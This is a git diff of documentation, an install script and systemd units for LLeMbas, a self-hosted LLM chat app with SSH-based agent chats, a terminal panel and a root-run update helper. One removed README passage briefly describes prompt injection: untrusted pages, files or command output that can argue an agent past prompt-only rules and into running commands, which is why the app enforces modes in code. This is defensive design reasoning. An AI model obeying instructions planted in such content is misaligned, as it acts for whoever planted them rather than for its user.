workflow templates and defaults you set: size, steps, sampler, scheduler,
checkpoint. It reviews its own result and can try again
- **Semantic search** — pick an embedding model and library search fuses keyword
and meaning, so *"how do I get paid"* finds a document that says *"invoicing"*.
Choosing none is not a degraded mode: it is byte-for-byte the keyword search
that was always there, with nothing written and no requests made
- **Users, groups & permissions** — per-group grants that union rather than
override, model access restricted to chosen groups, read and write split for
notes, memory and skills, and a screen that answers *"what can this account
actually do?"* by naming where each permission came from
- **Quotas** — monthly tokens, concurrent replies, agent wall clock, images a
day, helpers a reply. Resolved by maximum across a person's groups, with zero
meaning *no limit*
- **Sharing** — hand a document, a note, a skill or a report to a group or a
person, read-only, with a *Shared with me* filter in every listing
- **Make it yours** — name, tagline, logo, favicon and launcher icons; the
Middle-earth wording is editable data; custom **themes** defined as a set of
colours rather than a stylesheet, and global CSS overrides
override, and model access restricted to chosen groups
- **Accounts** — first account becomes the administrator, argon2 password
hashing, revocable server-side sessions, self-service password change,
admin-managed accounts
- **Admin settings** — registration, upload and extraction limits, prompt
fragments, and an **Updates** page showing what is running, what is available
and what changed between
- **Two themes and your own** — *Moria* (dark), *Shire* (light), and as many
more as you care to define
- **Admin settings** — open or close registration from the UI, stored in the
database and effective immediately
- **Two themes** — *Moria* (dark) and *Shire* (light), switchable per user
**Planned**
OCR for scanned PDFs · conversation branching · chat export · archived chats.
Custom tools and MCP servers · agentic execution (local and over SSH) · image
generation · OCR for scanned PDFs · semantic search in the library.
See the [Roadmap](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Roadmap) for what
is built, what is not, and why.
## Documentation
The **[wiki](https://git.houmeres.sk/Houmeres/LLeMbas/wiki)** carries everything
about how this works and why — it is documentation *about* the project rather
than part of it, so a clone stays software.
- **[Working notes](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Working-notes)**
— read this before changing anything. The hard rules the project is built
around, the layout, and a long catalogue of *things that will bite you*: bugs
that shipped looking correct, why each happened, and what stops it recurring.
- **[Roadmap](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Roadmap)** — what is
built, what is deliberately not, and the reasoning behind each.
- A page each for agent chats, schedules and reports, permissions and sharing,
search and extraction, image generation, subagents, branding, and the manual
release checklist.
See [PLAN.md](PLAN.md) for what is built, what is not, and why.
## Quick start
@@ -170,8 +91,7 @@ git clone https://git.houmeres.sk/Houmeres/LLeMbas.git
cd LLeMbas
python -m venv .venv && . .venv/bin/activate
pip install -e ".[dev,search,ssh]" # search: DuckDuckGo. ssh: agent chats.
# Drop either if you do not want it
pip install -e ".[dev,search]" # `search` adds DuckDuckGo; drop it if unwanted
cp .env.example .env
lembas secret-key # paste the result into LEMBAS_SECRET_KEY
@@ -217,106 +137,6 @@ Recorded audio is passed straight through and never written to disk.
> The microphone needs HTTPS or localhost. Browsers do not grant it over plain
> HTTP, so a LAN install without TLS will not offer dictation.
### Agent chats
**Admin → Agents** to turn the feature on, then **Connections** in the sidebar
to add a machine. Three things have to line up before an agent chat can start:
the feature enabled, the *Run commands* permission, and a model flagged **Agent
execution**. All three are off by default, on purpose.
Nothing an agent does runs on the machine LLeMbas is on. Commands go to a host
you name over SSH, which means **the containment is that host** — a container
built for the job is a very different thing from a key to a server you care
about, and LLeMbas cannot tell them apart. A throwaway container is the intended
shape:
```bash
docker run -d --name agent-box -p 127.0.0.1:2222:22 <an sshd image>
```
Adding a connection does not connect to it. **Check** shows you the host's
fingerprint with nothing sent — not your username, not your key — and only
accepting pins it. If that host later answers with a different key, it is
refused rather than quietly trusted.
Then start a chat with the **Agent** toggle, pick the connection, browse to a
directory, and choose a mode — all of it under the message box, before you send
anything. The connection and the directory are fixed once the chat exists; the
mode changes at any time and stays where you chose it:
| | Reads | Writes files | Runs commands |
|---|---|---|---|
| **Manual** | asks | asks | asks |
| **Edit** | free | free | asks |
| **Auto** | free | free | free |
| **Plan** | free | asks | asks |
The mode is enforced in the reply loop, not written into the prompt: everything
a model reads — a web page, a README, the last command's output — is untrusted,
and a rule that lives only in a system message is one a poisoned file can argue
with. In **Auto**, nothing stands between that and a command running.
*Plan* finishes by proposing steps, with a button that carries them out — which
switches to *Edit*, never *Auto*, because the plan was written under a mode
where every command still asked.
#### What the model knows about the directory
An agent chat starts by listing the project directory, so a reply does not spend
its first rounds finding out what is there. It is one read-only command —
`git ls-files` in a repository, so `.gitignore` is honoured for free, otherwise
`find` with the usual noise pruned — and it is cached and shared by every chat
pointed at the same place.
What reaches the model is budgeted rather than dumped: a directory that will not
fit is shown as `node_modules/ (4,102 files)` and the model is told to open it
itself if it needs to. **Admin → Agents** sets the budget, and `0` keeps the
listing for the `@` picker while putting none of it in the prompt.
Listing a directory and browsing one are things *you* asked for, not things a
model chose, so neither goes through the modes above. Worth knowing if you read
**Manual** as "nothing happens without me": it means nothing the *model* does.
#### The terminal
An agent chat has a **Terminal** button in its header, which opens a real shell
on that chat's connection, in its directory, beside the conversation. It needs
the *Open a terminal* permission, which is off by default.
The modes above do not apply to it. They exist because a model reads pages,
files and command output it did not write; you hold the credential and could
open the same shell with an ssh client, so nothing you type is queued for your
own approval. The model cannot see the panel either — three buttons in its
header decide what it sees: **Copy** takes the last command and its output to
the clipboard, **Send** puts the same into the message box, and **Auto**
collects every command you run into your next message. Nothing is ever sent on
its own; the box is where you read it first.
Knowing what "the last command" means takes a little help from the shell.
LLeMbas gives bash and zsh the same invisible markers VS Code and WezTerm use,
written into a temporary file the shell deletes itself, so it can tell one
command's output from the next and record the exit status and the directory.
Your own dotfiles are loaded first and nothing of yours is skipped. Any other
shell starts exactly as it would have; the two buttons then copy the last of the
screen as it appeared, say so, and Auto is switched off rather than guessing.
Drag the panel's left edge to make it wider — a terminal narrower than eighty
columns re-wraps everything a program prints — and the width follows you to
another browser.
The shell is not tied to the panel. Close it and a build carries on; come back,
or reload, and you reattach with the scrollback. Two tabs share one shell, and
the smaller window decides the size. It ends when nobody has watched it and
nothing has been typed for a while, when the chat is deleted, when the
connection is disabled or deleted, or when LLeMbas restarts — a deploy cuts off
whatever was running, and the panel says so rather than quietly opening a fresh
shell that has lost your working directory.
> Nothing typed here is in the transcript and nothing is logged but the opening
> and the closing. If you are running this over plain http, note that the
> session cookie is not marked `secure` so a LAN install works at all — with a
> terminal switched on, that is worth a certificate.
### The library
**Sidebar → Library**, and **Settings → Memory**. Nothing is on by default for a
@@ -371,92 +191,6 @@ lembas secret-key # generate a value for LEMBAS_SECRET_KEY
lembas create-admin # create or promote an administrator
```
## Running it somewhere
Three ways, all in this repository.
### Docker
```bash
export LEMBAS_SECRET_KEY="$(lembas secret-key)" # required; there is no default
docker compose up -d
```
One stage, no build step, non-root. The image bakes **no secret key, no data and
no `.git`** — a key inside an image is one every copy shares, and rotating it
makes stored API keys unreadable. Data lives in a named volume on `/data`.
`docker-compose.yml` publishes on `127.0.0.1` and expects a TLS proxy in front:
the service worker and the microphone both require HTTPS or localhost, so plain
http on a LAN address is a constraint rather than a preference. One replica, and
that is deliberate — the generation registry, the terminal sessions and the
schedule ticker are all in-process, so two would mean every schedule firing
twice.
**Updating a container is pulling a new image**, and `/admin/updates` says so
rather than offering a button:
```bash
docker compose pull && docker compose up -d
```
There is deliberately no in-container update helper. The one the other install
paths use restarts a systemd service; the equivalent here would be a process
inside the container reaching the Docker socket to replace the container it is
running in — which is root on the host, granted to anybody who can administer
the web interface. The image is the unit of deployment, and that is the whole
point of it.
### A machine of its own
`deploy/` holds a systemd unit, an nginx vhost, and install/update scripts. Every
template is parameterised and substituted at install time, so nothing
host-specific is committed here. See [deploy/README.md](deploy/README.md).
`deploy/lxc-install.sh` creates an unprivileged Proxmox container and runs that
same installer inside it — a wrapper around what already works rather than a
second install path:
```bash
CTID=140 SITE_HOST=chat.example ./deploy/lxc-install.sh
```
The container gets the **update helper by default**, unlike a bare
`install.sh`. The installer defaults it off because it cannot know what it is
installing onto; a container this script made thirty seconds ago to run one
thing, on a hypervisor you own, is not that host — and an appliance you cannot
update without a shell is one nobody updates. `INSTALL_UPDATE_HELPER=0` opts
out.
### Updating
**Admin → Updates** shows the version running, what is available on the channel
this host follows, and the commits between. `stable` is the newest `vX.Y.Z` tag;
`edge` is the branch tip, which is whatever was pushed most recently.
The button that applies an update is **opt-in**, and that is the design: the
service runs unprivileged and cannot restart itself, so the request is a file
that a systemd `.path` unit picks up and runs as root. It carries no ref and no
channel — pressing it is always "deploy the channel this host was configured
with", never "deploy something else". Install it with
`INSTALL_UPDATE_HELPER=1`; without it the page says so and prints the command to
run by hand.
Release notes come out of the annotated tag itself, so no forge API is involved
anywhere.
Root runs a **copy** of `deploy/update.sh` that the installer places outside the
checkout and root owns. It must not run the one in the checkout: that file
belongs to the unprivileged service account, so anything able to write as that
account could rewrite it and become root — and so could whoever controls the
branch, since a pull happens as that account and root would run whatever it
fetched. The cost is that changing `update.sh` needs the installer re-run, and
it tells you when your copy has fallen behind.
**If you installed the helper before this changed, re-run the installer.** The
old wiring points systemd at the checkout, and the update script now says so
loudly when it notices it is running from there.
## How it fits together
```
@@ -496,7 +230,7 @@ python scripts/fetch_vendor.py # verify vendored JS against the lockfile
There is no Alembic. The schema is SQLite-only and synchronised at startup:
missing tables and missing columns are added automatically, so adding a field to
a model needs nothing but a restart. Renames, drops and retypes are still manual
— see the [working notes](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Working-notes).
— see `CLAUDE.md`.
## Artwork
+5 -173
View File
@@ -44,94 +44,8 @@ Everything is overridable from the environment:
| `SERVICE_USER` | `lembas` | system account to run as |
| `HOME_DIR` | `/home/lembas` | that account's home |
| `PREFIX` | `/srv/lembas` | install root (bind mount of `HOME_DIR`) |
| `REPO_URL` | this checkout's `origin` | so a fork deploys itself. **Must be https** — see below |
| `LEMBAS_BRANCH` | `main` | branch to fetch, and what the `edge` channel follows |
| `LEMBAS_CHANNEL` | `stable` | `stable` follows release tags, `edge` follows the branch tip |
| `INSTALL_UPDATE_HELPER` | `0` | `1` lets the web interface deploy that branch as root |
**The deployment fetches over HTTPS, on purpose.** The service user has no SSH
key and should not have one: a credential that can push to the repository,
sitting on a box, to do a read-only job. If you push over SSH your checkout's
`origin` is an `ssh://` URL, which is the one thing that cannot work here — so
the installer refuses it and names the fix rather than letting the clone fail
with `Permission denied (publickey)` from an account you were not thinking about.
## Channels
| | follows | for |
|---|---|---|
| `stable` (default) | the newest `vX.Y.Z` tag | anybody running this |
| `edge` | the tip of `LEMBAS_BRANCH` | whoever is building it |
**A branch tip is not a release.** Following `main` means deploying whatever was
pushed five minutes ago, possibly mid-feature — right for development and wrong
for a machine somebody depends on. Stable is the default for that reason.
A tag with a suffix (`v1.1.0-rc1`) is deliberately **not** a release: git's
version sort puts it *above* `v1.1.0`, so accepting one would step a stable host
onto a release candidate on the strength of a hyphen. A prerelease is something
you check out by name.
Release notes travel inside **annotated** tags, so `git tag -a v1.1.0 -m "…"` is
what puts them on the update page. Tags here are **signed** (`tag.gpgSign`), and
the notes render the same either way — `updates._notes_for` cuts the
`-----BEGIN SSH SIGNATURE-----` block off `%(contents)`, which would otherwise be
forty lines of base64 on the page. No forge API is involved anywhere — which
matters more than it sounds: a token on the deployment host to answer a
read-only question about version numbers is a bad trade, it would tie this to
one forge, and the Gitea API this was checked against returns a 500 from a
server-side panic on exactly that endpoint.
## Updating from the web interface
`/admin/updates` says what is running (`git describe`, so `1.0.0` at a tag and
`1.0.0-7-gd4f56d` seven commits past one), what the channel offers, the release
notes, and the commits between. **Checking** reaches the remote; opening the page
does not.
The button is opt-in, and the reason is a boundary rather than caution:
```bash
INSTALL_UPDATE_HELPER=1 SITE_HOST=chat.example ./deploy/install.sh
```
That installs `lembas-update.path` and `lembas-update.service`, and puts a
**root-owned copy** of `update.sh` at `/usr/local/lib/lembas/update.sh`. The web
interface writes `$PREFIX/data/update-requested`; the path unit notices and the
service runs that copy **as root**, on the configured channel.
**Why a copy.** The unit used to point inside the checkout, and `install.sh`
clones the checkout *as the service user* — so root was executing a file the
unprivileged account could rewrite, and one that every update replaces with
whatever the branch contained. Either turns a compromise of the web application
into root, and the second needs no compromise at all. The cost is that changing
`update.sh` needs the installer re-run; the script tells you when its copy has
fallen behind, and says so loudly if it finds itself running from inside the
checkout.
**If you installed the helper before 1.0.0, re-run the installer.** The old
wiring stays until you do, and the update button cannot fix it — the button runs
the old unit.
**What that grants.** Anybody who can administer this web interface can then
deploy whatever is on the configured branch and restart the service. That is the
point of it, and it is why it is not the default.
**What it deliberately does not grant.** The request file carries nothing that
reaches a command line — no ref, no branch, no channel, no arguments, and its
*contents* are never read at all. Both are baked into the unit at install time,
so the button is always "deploy the channel this host was configured with" and
never "deploy something else". Re-running the installer without the flag removes
both units, the marker and the root-owned copy, and the page goes back to
printing the manual command.
A re-run **keeps the channel this host already follows** rather than resetting it
to `stable`: the channel is declared in `lembas.env` and in the unit, a re-run
keeps the first while rewriting the second, and an installer that silently moved
one half was causing exactly the mismatch the Updates page detects.
Without the helper the page says so and shows `sudo …/deploy/update.sh`, which is
the same honest degradation the SSH and search extras have.
| `REPO_URL` | this checkout's `origin` | so a fork deploys itself |
| `LEMBAS_BRANCH` | `main` | branch to deploy |
## Deploying a change
@@ -145,45 +59,6 @@ reinstalls dependencies and restarts, printing the commits it pulled. The hard
reset is deliberate: nothing is ever edited in place there, so there is no local
work to preserve and no conflicts to resolve.
## In a container
A `Dockerfile` and a `docker-compose.yml` are in the repository root.
```bash
echo "LEMBAS_SECRET_KEY=$(python -c 'import secrets;print(secrets.token_urlsafe(48))')" > .env
docker compose up -d
```
It publishes on `127.0.0.1:8080` and expects **a TLS reverse proxy in front**.
That is a constraint, not a preference: a service worker and a microphone both
require HTTPS or localhost, so over plain http on a LAN address the app cannot be
installed and cannot dictate — and the session cookie is deliberately not marked
`secure`, so an attacker on that network could steal a session.
Three things about the image:
- **No secret key is baked in**, and compose refuses to start without one. A key
in an image is a key every copy of that image shares, and rotating it signs
everybody out *and* makes stored upstream API keys unreadable.
- **`.git` is excluded**, so `/admin/updates` inside a container says it was not
installed from a checkout and offers nothing. That is correct: a container is
updated by pulling a new image.
- **One replica.** The generation registry, the stop mechanism, the terminal
sessions and the schedule ticker are all in-process — two would mean two
tickers and every schedule firing twice.
## On Proxmox
```bash
CTID=140 SITE_HOST=chat.example ./deploy/lxc-install.sh
```
Run on the Proxmox host. It creates an **unprivileged** Debian container,
installs the dependencies, and runs `deploy/install.sh` inside it — the same
installer, so a fix there reaches this without anybody remembering. Unprivileged
is not a default to change: nothing LLeMbas does needs privilege, because agent
chats run their commands over SSH on some *other* machine.
## Operating it
```bash
@@ -206,53 +81,10 @@ delivers it in one lump at the end, which is indistinguishable from streaming
being broken. `proxy_read_timeout` is raised to an hour because a model can
think for minutes before the first token.
**The vhost passes WebSocket upgrades through, and must.** The terminal panel
is the one WebSocket in LLeMbas. A `location` that sets `Connection ""` — which
is what SSE alone needs, and what this template used to say — fails every
handshake, and a failed handshake tells the browser nothing: no status, no
reason. The `map $http_upgrade` at the top of the vhost yields the empty string
when the client did not ask to upgrade, so streaming is unaffected. `update.sh`
warns when the installed vhost has drifted from the template, because this is
the failure most likely to be diagnosed as a bug in the application.
**Every restart kills every open shell.** A reply being written is persisted
with whatever it has; a terminal has nothing to persist, so a command still
running on the far side is cut off. `update.sh` restarts unconditionally, so a
deploy in the middle of somebody's `apt-get dist-upgrade` ends it. The panel is
told why rather than silently reconnecting to a new shell, which would have
lost the working directory and the half-typed command.
**A terminal is not in the transcript, and is not logged.** The open and the
close are logged with the user, the chat and the connection; what was typed is
not recorded anywhere. That follows from the design — the chat's mode governs
the model, not the person at the keyboard — but everything else an agent chat
does *is* in the transcript, so it is a difference in kind and worth knowing
before somebody goes looking for the history.
**Nothing an agent does runs on this machine.** Agent chats execute their
commands over SSH, on a host somebody added and prepared — a container, a VM,
another machine. That is the whole isolation story, and it is why the unit can
stay locked down instead of being opened up to make room for a sandbox.
`ProtectSystem=full` rather than `strict` only because the data directory must
be writable and `strict` would mean listing every path.
The practical consequence for whoever runs this: **the security of an agent
chat is the security of the host behind its SSH profile.** A throwaway
container with the one project mounted into it is a very different thing from a
key to a production server, and LLeMbas cannot tell them apart.
**Hardening is deliberately moderate.** `ProtectSystem=full`, not `strict`: the
agentic features planned for later need to run commands, and a lockdown that
has to be torn out again is worse than one that was never applied.
**Use a real certificate if this is exposed beyond a trusted LAN.** The
self-signed cert exists so the install works with no external dependencies;
point `ssl_certificate` at a real one and nothing else needs to change.
The session cookie is deliberately not marked `secure`, so that a LAN install
over plain http can sign anybody in at all. That has always meant a network
attacker on http could steal a session; with the terminal it also means they
could open an interactive shell on the machine behind that chat. If the
terminal is switched on, run this over TLS.
**One worker only.** True of generations already — the registry is in-process —
and sharper here: with two workers a browser reconnecting to its terminal could
land in the process that has no shell for it, and silently open a second one on
the same machine.
+6 -142
View File
@@ -26,32 +26,6 @@ SERVICE_USER="${SERVICE_USER:-lembas}"
HOME_DIR="${HOME_DIR:-/home/lembas}"
PREFIX="${PREFIX:-/srv/lembas}"
BRANCH="${LEMBAS_BRANCH:-main}"
# Which channel this host follows: `stable` (the newest release tag) or `edge`
# (the branch tip). Stable by default, because a branch tip is not a release --
# following one means deploying whatever was pushed five minutes ago, which is
# right for whoever builds this and wrong for whoever runs it.
# On a **re-run**, default to what this host already follows rather than to
# `stable`. The channel lives in two places -- `lembas.env`, which the page
# reads, and the systemd unit, which the button obeys -- and a re-run keeps the
# env file ("keeping it, and its secret key") while rewriting the unit. So a
# re-run to fix something unrelated silently moved one half and not the other,
# and left the host with a page naming one channel and a button deploying
# another. That mismatch has an alert of its own; an installer that *causes* it
# is the wrong end to be detecting it from.
#
# Parsed, not sourced -- `lembas.env` holds the secret key, and there is no
# reason for this to have it in a variable.
_installed_channel=""
if [[ -f "$PREFIX/lembas.env" ]]; then
_installed_channel=$(sed -n 's/^LEMBAS_UPDATE_CHANNEL=\([a-z]\{1,16\}\)$/\1/p' \
"$PREFIX/lembas.env" | tail -1)
fi
CHANNEL="${LEMBAS_CHANNEL:-${_installed_channel:-stable}}"
# Whether to install the units that let the web interface update this host.
# Off, and off on a re-run that does not ask for it: it grants anybody who can
# administer the web UI the ability to deploy the branch, as root. See the
# "Updating from the web interface" section of deploy/README.md.
INSTALL_UPDATE_HELPER="${INSTALL_UPDATE_HELPER:-0}"
# Default to wherever this checkout came from, so a fork deploys itself.
REPO_URL="${REPO_URL:-$(git -C "$HERE" remote get-url origin 2>/dev/null || true)}"
@@ -64,44 +38,18 @@ if [[ -z "$REPO_URL" ]]; then
exit 1
fi
# The deployment clones as the service user, which has no SSH key and should not
# have one: a credential that can push to the repository, sitting on a box, to
# do a read-only job. Whoever runs this usually has an ssh:// origin because
# *they* push over SSH, so the default inherited from their checkout is the one
# thing that cannot work here.
#
# The clone would fail loudly anyway. Saying so first turns "Permission denied
# (publickey)" from the service user into a sentence that names the fix.
if [[ "$REPO_URL" == ssh://* || "$REPO_URL" == git@* ]]; then
echo "== repository ==" >&2
echo " $REPO_URL is an SSH URL, and $SERVICE_USER has no key." >&2
echo " Set an https URL, which is what a deployment should fetch over:" >&2
echo " REPO_URL=https://host/owner/repo.git $0" >&2
echo " (Or give $SERVICE_USER a read-only deploy key and re-run.)" >&2
exit 1
fi
echo "== plan =="
echo " host : https://$SITE_HOST -> 127.0.0.1:$APP_PORT"
echo " user : $SERVICE_USER ($HOME_DIR)"
echo " prefix : $PREFIX"
echo " repo : $REPO_URL ($BRANCH, $CHANNEL channel)"
if [[ "$INSTALL_UPDATE_HELPER" == "1" ]]; then
echo " updates : web interface may deploy $BRANCH as root (helper units)"
else
echo " updates : by hand only ($PREFIX/app/deploy/update.sh)"
fi
echo " repo : $REPO_URL ($BRANCH)"
echo "== service user =="
# --system: no ageing, no mail spool. Home under /home, not /var/lib, so the
# venv and database sit on the larger volume.
#
# `/usr/sbin/nologin` is Debian's path and works on both: Arch keeps `nologin`
# in /usr/bin, but its /usr/sbin is a symlink to bin, so the Debian spelling
# resolves there while the Arch one does not resolve on Debian at all.
if ! getent passwd "$SERVICE_USER" >/dev/null; then
sudo useradd --system --create-home --home-dir "$HOME_DIR" \
--shell /usr/sbin/nologin --comment "LLeMbas" "$SERVICE_USER"
--shell /usr/bin/nologin --comment "LLeMbas" "$SERVICE_USER"
else
echo " user $SERVICE_USER already exists"
fi
@@ -124,22 +72,13 @@ else
fi
echo "== virtualenv =="
# `python3`, not `python`. On Arch -- the machine this was written on and the
# only one it had ever run on -- `python` is Python 3 and the bare name worked.
# On Debian it does not exist unless somebody installed `python-is-python3`, so
# the LXC bootstrap aborted here, after the service user, the bind mount and the
# clone were already in place. `python3` is correct on both.
if [[ ! -x "$VENV/bin/python" ]]; then
sudo -u "$SERVICE_USER" python3 -m venv "$VENV"
sudo -u "$SERVICE_USER" python -m venv "$VENV"
fi
sudo -u "$SERVICE_USER" "$VENV/bin/pip" install --quiet --upgrade pip
# The extras a deployment gets. `search` because DuckDuckGo is the default web
# search provider and is meant to need no setup; `ssh` because agent chats reach
# their machine over it and a deployment without it offers the feature with an
# install hint instead. Listed here AND in update.sh -- an extra added to only
# one of them means existing deployments silently miss it.
LEMBAS_EXTRAS="${LEMBAS_EXTRAS:-search,ssh}"
sudo -u "$SERVICE_USER" "$VENV/bin/pip" install --quiet -e "$APP[$LEMBAS_EXTRAS]"
# With the `search` extra: DuckDuckGo is the default web search provider and is
# meant to work with no setup at all.
sudo -u "$SERVICE_USER" "$VENV/bin/pip" install --quiet -e "$APP[search]"
echo "== environment =="
# Generated once and never regenerated: rotating LEMBAS_SECRET_KEY signs every
@@ -158,13 +97,6 @@ LEMBAS_PORT=$APP_PORT
LEMBAS_LOG_LEVEL=info
LEMBAS_ALLOW_SIGNUP=true
LEMBAS_DEFAULT_THEME=moria
# Which branch /admin/updates compares against. Deployment configuration, not
# an instance setting: it decides what code runs here, and a value a web
# administrator could edit would turn "you may deploy the branch" into "you may
# deploy anything".
LEMBAS_UPDATE_BRANCH=$BRANCH
# stable follows the newest release tag; edge follows the branch tip.
LEMBAS_UPDATE_CHANNEL=$CHANNEL
EOF
sudo chown "$SERVICE_USER:$SERVICE_USER" "$ENV_FILE"
sudo chmod 600 "$ENV_FILE"
@@ -178,68 +110,8 @@ sudo install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 750 "$PREFIX/data"
echo "== systemd unit =="
sed -e "s|__PREFIX__|$PREFIX|g" -e "s|__SERVICE_USER__|$SERVICE_USER|g" \
"$HERE/lembas.service" | sudo tee /etc/systemd/system/lembas.service >/dev/null
# Which version of the template this host is running. update.sh compares
# against it and says so when the template moves on, because the installed
# unit usually grows host-specific lines and cannot simply be overwritten.
sha256sum "$HERE/lembas.service" | cut -d' ' -f1 | sudo tee "$PREFIX/.unit-applied" >/dev/null
sudo systemctl daemon-reload
echo "== update helper =="
# Two units and a marker. The marker is what the web interface reads to decide
# whether to offer the button at all -- a file rather than `systemctl
# is-enabled`, because that would be a subprocess on every page render to answer
# a question that changes once.
UPDATE_MARKER="$PREFIX/data/.update-helper"
# Where root's copy of the update script lives, and why it is a copy.
#
# The unit runs as root. Pointing its ExecStart at `$PREFIX/app/deploy/update.sh`
# meant root executing a file owned by the **unprivileged service account** --
# so anything able to write as that account could rewrite the script, create the
# request file it also owns, and be root. That is the whole privilege boundary
# the helper exists to keep, defeated by a `chown`.
#
# The second path is worse because it needs no compromise at all: an update
# pulls new code *as the service user*, and root then runs whatever
# `deploy/update.sh` that pull contained. Control of the branch would have been
# control of root.
#
# So root runs a copy it owns, installed here, by an administrator, deliberately.
# The cost is that improving `update.sh` needs `install.sh` re-run -- which is
# the correct trade: root should not execute a script that arrived over the
# network a moment ago.
UPDATE_HELPER_DIR="/usr/local/lib/lembas"
UPDATE_HELPER="$UPDATE_HELPER_DIR/update.sh"
if [[ "$INSTALL_UPDATE_HELPER" == "1" ]]; then
sudo mkdir -p "$UPDATE_HELPER_DIR"
sudo install -o root -g root -m 755 "$HERE/update.sh" "$UPDATE_HELPER"
for unit in lembas-update.path lembas-update.service; do
sed -e "s|__PREFIX__|$PREFIX|g" \
-e "s|__SERVICE_USER__|$SERVICE_USER|g" \
-e "s|__UPDATE_BRANCH__|$BRANCH|g" \
-e "s|__UPDATE_CHANNEL__|$CHANNEL|g" \
-e "s|__UPDATE_HELPER__|$UPDATE_HELPER|g" \
"$HERE/$unit" | sudo tee "/etc/systemd/system/$unit" >/dev/null
done
sudo systemctl daemon-reload
sudo systemctl enable --now lembas-update.path
# The channel goes *into* the marker, not just its existence. It is declared
# in two places -- the unit above and lembas.env -- and this is what lets the
# Updates page notice when somebody has edited one and not the other.
echo "$CHANNEL" | sudo tee "$UPDATE_MARKER" >/dev/null
sudo chown "$SERVICE_USER:$SERVICE_USER" "$UPDATE_MARKER"
echo " installed. The web interface can now deploy the $CHANNEL channel and restart."
else
# Removed rather than left, so turning it off is re-running without the flag
# rather than remembering three commands. The button then says so and prints
# the manual one, which is the honest degradation.
sudo systemctl disable --now lembas-update.path 2>/dev/null || true
sudo rm -f /etc/systemd/system/lembas-update.path \
/etc/systemd/system/lembas-update.service "$UPDATE_MARKER" \
"$UPDATE_HELPER"
sudo systemctl daemon-reload
echo " not installed (INSTALL_UPDATE_HELPER=1 to allow updating from the web UI)"
fi
echo "== self-signed cert for $SITE_HOST =="
sudo mkdir -p /etc/nginx/ssl
if [[ ! -f "/etc/nginx/ssl/$SITE_HOST.crt" ]]; then
@@ -256,14 +128,6 @@ sed -e "s|__SITE_HOST__|$SITE_HOST|g" -e "s|__APP_PORT__|$APP_PORT|g" \
sudo nginx -t
sudo systemctl reload nginx
# What this host was installed with, so update.sh can name the vhost it should
# be comparing against and print a command that actually runs. Without it the
# drift check below could only say "something changed somewhere".
printf 'SITE_HOST=%s\nAPP_PORT=%s\n' "$SITE_HOST" "$APP_PORT" \
| sudo tee "$PREFIX/.deploy-env" >/dev/null
sha256sum "$HERE/nginx-vhost.conf" | cut -d' ' -f1 \
| sudo tee "$PREFIX/.vhost-applied" >/dev/null
echo "== local name resolution =="
# Only useful when the LAN's DNS does not already answer for this name.
if ! getent hosts "$SITE_HOST" >/dev/null; then
-23
View File
@@ -1,23 +0,0 @@
# Watches for an update request written by the web interface.
#
# install.sh substitutes __PREFIX__ and writes the result to
# /etc/systemd/system/lembas-update.path. Installed only when the installer is
# run with INSTALL_UPDATE_HELPER=1 — see deploy/README.md for what that decision
# means.
#
# `PathExists` rather than `PathChanged`: the service deletes the file as its
# first act, so the unit re-arms itself and a second request fires again. With
# `PathChanged` a request written while the service was running would be missed.
[Unit]
Description=Watch for a LLeMbas update request
# Only while the thing being updated is meant to be running. Stopping lembas on
# purpose should not leave a watcher that restarts it.
PartOf=lembas.service
[Path]
PathExists=__PREFIX__/data/update-requested
Unit=lembas-update.service
[Install]
WantedBy=multi-user.target
-47
View File
@@ -1,47 +0,0 @@
# Runs deploy/update.sh when the web interface asks for it.
#
# install.sh substitutes __PREFIX__, __SERVICE_USER__ and __UPDATE_BRANCH__ and
# writes the result to /etc/systemd/system/lembas-update.service.
#
# **What this grants.** Installing it means anybody who can administer the web
# interface can deploy whatever is on the configured branch, as root, and
# restart the service. That is the point of it, and it is why it is opt-in and
# why the installer says so out loud rather than doing it by default.
#
# **What it deliberately does not grant.** The request file carries nothing that
# reaches this command line: no ref, no branch, no channel, no arguments. Both
# are baked in below from the installer's environment, so pressing the button is
# "deploy the channel this host was configured with" and can never be "deploy
# something else". Nothing reads the file's *contents* either -- `ExecStartPre`
# deletes it and the `.path` unit only ever tested that it exists.
#
# And root runs a script **root owns**. See ExecStart.
[Unit]
Description=Apply a requested LLeMbas update
# Not `After=lembas.service`: this restarts it, and an ordering dependency on
# the thing being restarted is how a one-shot ends up waiting for itself.
[Service]
Type=oneshot
# Deleted first, always. The path unit re-arms on the file existing, so leaving
# it in place would run this again the moment the service came back -- an
# update loop with no obvious cause. `-` so a failure to delete does not stop
# the update, and `ExecStartPre` so it happens even if the script itself fails.
ExecStartPre=-/usr/bin/rm -f __PREFIX__/data/update-requested
Environment=SERVICE_USER=__SERVICE_USER__
Environment=PREFIX=__PREFIX__
Environment=LEMBAS_BRANCH=__UPDATE_BRANCH__
Environment=LEMBAS_CHANNEL=__UPDATE_CHANNEL__
# **Not** `__PREFIX__/app/deploy/update.sh`. That path is inside the checkout and
# owned by the unprivileged service account, so root would have been executing a
# file that account could rewrite -- and that an update could replace, since a
# pull runs as that account and root runs whatever it fetched on the next press.
# `install.sh` puts a root-owned copy here instead. Improving the script means
# re-running the installer, which is the right cost.
ExecStart=/bin/bash __UPDATE_HELPER__
# The script's own failure path prints the journal and exits non-zero, which is
# what makes `systemctl status lembas-update` say what went wrong.
StandardOutput=journal
StandardError=journal
TimeoutStartSec=600
+3 -13
View File
@@ -28,13 +28,9 @@ RestartSec=5
# installer sets to 127.0.0.1: reachable through nginx, never directly.
# --- Hardening -------------------------------------------------------------
# Agent chats run their commands over SSH, on a machine somebody chose and
# prepared -- a container, a VM, another host. Nothing an agent does executes
# here, which is what lets this stay locked down rather than being opened up to
# make room for a sandbox.
#
# ProtectSystem stays `full` rather than `strict` only because the data
# directory has to be writable and `strict` would need every path spelled out.
# Moderate rather than maximal. The agentic features planned for later need to
# run commands, and a lockdown that has to be torn out again is worse than one
# that was never applied.
NoNewPrivileges=yes
PrivateTmp=yes
ProtectSystem=full
@@ -44,11 +40,5 @@ RestrictSUIDSGID=yes
ReadWritePaths=__PREFIX__
LimitNOFILE=65535
# Bounds on the service as a whole. Not aimed at anything in particular; a web
# application that has grown a habit of holding network connections open is
# worth a ceiling.
TasksMax=2048
MemoryMax=8G
[Install]
WantedBy=multi-user.target
-156
View File
@@ -1,156 +0,0 @@
